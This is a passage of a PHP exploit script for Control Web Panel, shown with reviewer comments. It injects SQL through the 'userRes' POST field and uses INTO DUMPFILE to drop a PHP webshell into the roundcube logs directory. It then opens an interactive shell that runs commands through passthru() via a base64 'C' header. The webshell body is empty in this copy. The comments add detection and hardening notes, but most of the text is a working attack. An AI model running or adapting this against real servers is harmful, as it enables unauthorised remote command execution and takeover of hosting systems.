\n";
// Tail of the usage/help branch; its opening lines are outside this excerpt.
print "\nExample....: php $argv[0] 127.0.0.1 egix";
print "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
die();
}

// Returns $input as a "0x"-prefixed string of two lowercase hex digits per byte.
// NOTE(review): presumably the result is meant to be read as a MySQL-style hex
// literal, so the value can be placed in the injected statement without quotes.
// $encoded is never initialised before the first ".=", so PHP reports an
// undefined-variable notice/warning on every call; for an empty $input the
// function returns just "0x".
function hex_enc($input) {
    for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i]));
    return "0x{$encoded}";
}

// One curl handle is reused for both stages. Stage 1 targets
// https://<argv[1]>:2083/<argv[2]>/ and returns the response body as a string.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate and hostname verification are both switched off, so the TLS peer
// is never authenticated.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");

// Stage 1: SQL injection through the POST field "userRes".
// The value opens with a double quote (presumably to close a quoted string in
// the server-side query, which is not shown here), appends a 13-column UNION
// SELECT and ends with INTO DUMPFILE, so the database server itself writes the
// second column to a file under the web-served roundcube/logs directory. The
// trailing "#" comments out the rest of the original statement.
// The file name is uniqid() (a time-based identifier) plus ".php".
// The string passed to hex_enc() is empty in this listing (possibly stripped
// during page extraction), so the content of the dropped file is not shown here.
//
// Defensive reading, grounded in what this request needs in order to work:
//   - "userRes" must reach a SQL statement unparameterised; binding it as a
//     parameter removes the injection point.
//   - The database account must be allowed to write files; withholding the
//     FILE privilege or restricting secure_file_priv blocks INTO DUMPFILE.
//   - The logs directory must be writable by the database process and must
//     execute .php files when requested; either condition can be removed.
//   - Detection: POST bodies on port 2083 whose userRes contains
//     "UNION SELECT" / "INTO DUMPFILE", and new *.php files appearing in
//     /usr/local/cwpsrv/var/services/roundcube/logs/.
print "\n[+] Injecting PHP webshell\n";
$sh_fname = uniqid() . ".php";
$phpshell = hex_enc("");
$injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));
// The response of the injection request is discarded; nothing here checks
// whether the file was actually written.
curl_exec($ch);

// Stage 2: the same handle is pointed at the dropped file on port 2031.
// $phpcode is a sprintf template: it prints a ___CMD___ marker, hands the
// base64-decoded command to passthru(), and prints the marker again so the
// output can be cut out of the response.
print "[+] Executing PHP webshell\n";
$phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
// NOTE(review): intended to undo the POST mode left over from stage 1 — confirm
// how the installed libcurl treats CURLOPT_POST = false after CURLOPT_POSTFIELDS.
curl_setopt($ch, CURLOPT_POST, false);

// Interactive loop: one line is read from STDIN per iteration; "exit" ends it.
// Each command is base64-encoded into the template, the filled template is
// base64-encoded again and sent in a custom request header named "C".
// Presumably the dropped file evaluates that header; its source is not visible
// in this listing.
// Detection: requests to /roundcube/logs/*.php on port 2031 that carry a "C:"
// header with a base64 value, and responses containing the ___CMD___ markers.
while(1) {
    print "\ncwp-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    // Prints whatever lies between the two markers (the /s flag lets "." span
    // newlines); if the markers are absent the script stops with the failure
    // message.
    preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}